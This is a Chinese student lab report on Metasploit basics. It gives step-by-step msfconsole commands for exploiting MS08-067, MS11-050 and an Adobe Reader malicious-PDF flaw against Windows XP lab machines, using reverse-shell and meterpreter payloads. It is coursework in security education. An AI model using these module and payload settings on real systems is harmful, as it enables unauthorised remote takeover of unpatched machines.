zoukankan      html  css  js  c++  java
  • 20145232韩文浩《网络对抗》MSF基础应用

    MS08-067漏洞攻击

    • 攻击机:Kali:192.168.31.132
    • 靶机:win XP SP3(English):192.168.31.180

    在VMware中设置两台虚拟机网络为NAT模式,自动分配IP地址,之后两台虚拟机修改IP后可以直接ping通。

    MS08_067远程漏洞攻击实践:Shell

    1、在kali终端中开启msfconsole。

    2、输入命令search ms08_067,会显示出找到的渗透模块,如下图所示:

    3、输入命令use exploit/windows/smb/ms08_067_netapi,进入该漏洞模块的使用。

    4、输入命令show payloads会显示出有效的攻击载荷,如下图所示,找到一个 shell_reverse_tcp

    5、命令show targets会显示出可以被攻击的靶机的操作系统型号,如下图所示:

    6、使用命令set payload generic/shell_reverse_tcp设置攻击有效载荷。

    7、输入命令show options显示我们需要在攻击前需要设置的数据。

    8、输入命令

    set LHOST "192.168.31.132" 
    
    set RHOST "192.168.31.180"
    

    并使用命令show options再次查看payload状态。

    9、输入命令exploit开始攻击,下图所示是正常攻击成功结果。

    在kali上执行ipconfig/all得到如下图所示:

    在win xp上执行同样的命令,如下图所示:

    MS08_067远程漏洞攻击实践:meterpreter

    1、前面依然使用命令use exploit/windows/smb/ms08_067_netapi,进入ms08_067漏洞模块。

    2、设置payload:set payload windows/meterpreter/reverse_tcp

    3、show options,查看需要设置的ip地址。

    4、成功攻击结果:

    5、执行ifconfig,查看靶机地址:

    6、ps查看进程:

    7、meterpreter转shell:

    MS11-050漏洞攻击

    • 攻击机:Kali:192.168.31.132
    • 靶机:windows xp sp3:192.168.31.133

    1、在kali终端中开启msfconsole。

    2、输入命令use windows/browser/ms11_050_mshtml_cobjectelement,进入该漏洞模块。

    3、输入info查看信息

    对应的targets:

    4、设置对应的载荷set payload windows/meterpreter/reverse_tcp

    5、show options查看需要设置的相关信息:

    6、设置相关信息

    set LHOST ‘192.168.31.132’
    
    set LPORT  5232
     
    set URIPATH baidu
    

    7、exploit,如下图所示,有靶机需要访问的ip地址:

    8、在靶机IE上输入网址,并在靶机上查看信息。

    靶机端IE:

    • kali中显示一个session 1已经创建:

    9、输入命令sessions -i 1,开始连接

    10、已经攻击成功了,获取shell

    Adobe阅读器渗透攻击

    • 攻击机:Kali:192.168.31.132
    • 靶机:win XP SP3:192.168.31.134

    1、在kali终端中开启msfconsole。

    2、输入命令use exploit/windows/fileformat/adobe_cooltype_sing,进入该漏洞模块的使用。

    3、使用命令set payload windows/meterpreter/reverse_tcp设置攻击有效载荷。

    4、输入命令show options显示我们需要在攻击前需要设置的数据,如下图红框圈住的部分。

    5、输入命令

    set FILENAME 5232_Adobe.pdf 
    
    set LHOST "192.168.31.132"
    
    set LPORT 5232
    

    并使用命令show options,看是否设置成功。

    6、输入exploit,生成pdf文件,并可以看到pdf所在文件夹,将pdf复制到靶机里。

    7、使用命令back退出当前模块,并使用use exploit/multi/handler新建一个监听模块。

    8、使用set payload windows/meterpreter/reverse_tcp建立一个反向连接。如下图所示,我需要输入命令set LPORT 5232和攻击模块里的数据设置为一样的。

    9、使用命令exploit开始攻击,在xp中打开pdf。这里pdf比较难打开,直接在kali中等结果就可以啦,如下图:

    实验问答

    用自己的话解释什么是exploit,payload,encode

    exploit是攻击监听的开始命令;payload是攻击载荷,是漏洞渗透的核心代码;encode是编码器,对payload的代码进行进一步编码。

  • 相关阅读:
    IplImage, CvMat, Mat 的关系
    neon memory copy
    基于v4l2的webcam应用, 本地预监
    makefile写法实例
    Ubuntu 12.04 使用Eclipse搭建C/C++编译环境
    xapp1167与TRD14.4 关系
    v3学院带你一次性认清UART、RS-232、RS-422、RS-485的区别
    v3学院教你学习-task和function的异同
    寒假参加V3
    FPGA培训学习心得
  • 原文地址:https://www.cnblogs.com/albieh/p/6714387.html
Copyright © 2011-2022 走看看